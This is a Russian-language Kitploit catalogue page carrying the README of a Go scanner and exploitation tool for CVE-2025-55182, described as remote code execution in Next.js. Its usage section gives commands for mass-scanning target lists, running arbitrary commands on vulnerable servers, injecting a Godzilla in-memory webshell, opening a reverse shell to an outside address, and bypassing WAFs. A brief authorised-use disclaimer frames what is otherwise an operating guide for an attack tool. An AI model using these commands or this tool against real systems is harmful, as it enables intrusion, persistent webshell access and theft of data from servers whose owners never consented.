Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-POC — Сканер и инструмент эксплуатации на Go для CVE-2025-55182 (RCE в Next.js). Поддерживает массовое сканирование, выполнение команд, внедрение оболочки в память Godzilla, обратную оболочку и обход WAF. | Kitploit
Инструменты/GitHubGitHub/luoqichen/cve-2025-55182-poc
Сканеры уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHubluoqichen/cve-2025-55182-poc

CVE-2025-55182-POC

Сканер и инструмент эксплуатации на Go для CVE-2025-55182 (RCE в Next.js). Поддерживает массовое сканирование, выполнение команд, внедрение оболочки в память Godzilla, обратную оболочку и обход WAF.

5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2025-55182 Next.js RCE Scanner

License

Инструмент для сканирования и эксплуатации уязвимости CVE-2025-55182 – удалённого выполнения кода в приложениях Next.js. Поддерживает массовое обнаружение, выполнение команд, инъекцию память-шелла Godzilla и обратный шелл.

⚠️ Данный инструмент предназначен исключительно для исследований безопасности и авторизованного тестирования. Не используйте его в незаконных целях.

Особенности

  • Сканирование нескольких целей: поддерживает одиночный URL, список URL в файле (по одному на строку) и папку, содержащую несколько .txt файлов.
  • Многопоточность: настраиваемое количество потоков для повышения эффективности.
  • Проверка уязвимости: верификация через анализ произведения случайных чисел.
  • Выполнение команд: произвольные системные команды на уязвимой цели (поддерживаются Linux и Windows).
  • Инъекция память-шелла Godzilla: однокнопочное создание информации для подключения Godzilla.
  • Обратный шелл: поддержка функции обратного шелла.
  • Сохранение результатов: автоматическое сохранение успешно использованных URL и подробностей в success.json, с возможностью вывода списка уязвимых URL в указанный файл.
  • Поддержка прокси: настраиваемый HTTP-прокси для интеграции с Burp Suite и другими инструментами.
  • Индикатор прогресса: отображение текущего прогресса, затраченного времени, оценочного оставшегося времени и т.д.

[]

Установка

Предварительные требования

  • Go 1.16 или новее
  • Git

Клонирование репозитория

root@kitploit:~
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC

Компиляция

root@kitploit:~
go build -o cve-2025-55182 main.go

Запуск

root@kitploit:~
./cve-2025-55182 -h

Использование

Параметры

Примеры

Сканирование одной цели

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000

Пакетное сканирование целей из файла

root@kitploit:~
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt

Выполнение команды

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -c "whoami"

Использование память-шелла Godzilla

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -g

После успешной инъекции инструмент выведет адрес подключения Godzilla, пароль, ключ и информацию о заголовке запроса.

Обратный шелл

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444

Включение прокси

root@kitploit:~
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10

Пояснение к выводу

  • success.json – автоматически сохраняет подробную информацию обо всех успешно эксплуатированных целях (включая вывод команд, конфигурацию Godzilla и т.д.).
  • Файл, указанный через -o – сохраняет список уязвимых URL (по одному на строку).

Во время сканирования в реальном времени отображается индикатор прогресса и найденные уязвимости. В конце выводятся статистические данные.

Примечания

  1. Убедитесь, что у вас есть разрешение – сканирование или атака на чужие системы без авторизации является незаконной.
  2. Использование прокси – если необходимо просматривать трафик через Burp Suite, используйте параметр -p для задания прокси.
  3. Подключение Godzilla – после успешной инъекции используйте клиент Godzilla для подключения. Обратите внимание, что пароль и ключ генерируются случайным образом.
  4. Настройка таймаута – для целей с плохим сетевым соединением можно увеличить значение параметра -to.

Отказ от ответственности

Данный инструмент предназначен только для исследований безопасности и авторизованного тестирования. Пользователь несёт полную юридическую ответственность. Разработчик не несёт ответственности за любое неправомерное использование.

License

MIT

Скачать инструмент
ПараметрТипЗначение по умолч.Описание
-ustringнетОдиночный целевой URL (например http://example.com:3000)
-fstringнетФайл со списком URL (по одному на строку)
-dstringнетПапка с несколькими .txt файлами
-ostringнетВыходной файл (список уязвимых URL, по одному на строку)
-tint10Количество потоков
-toint10Таймаут запроса (сек)
-cstringнетКоманда для выполнения (например id)
-mstringнетРежим: waf (включить обход WAF)
-pstringнетHTTP-прокси (например http://127.0.0.1:8080)
-gboolfalseВключить инъекцию память-шелла Godzilla
-rsstringнетАдрес для обратного шелла (формат IP:PORT)
-dvboolfalseПодробный режим (вывод процесса сканирования для каждого URL)
-esboolfalseРежим сканирования чувствительной информации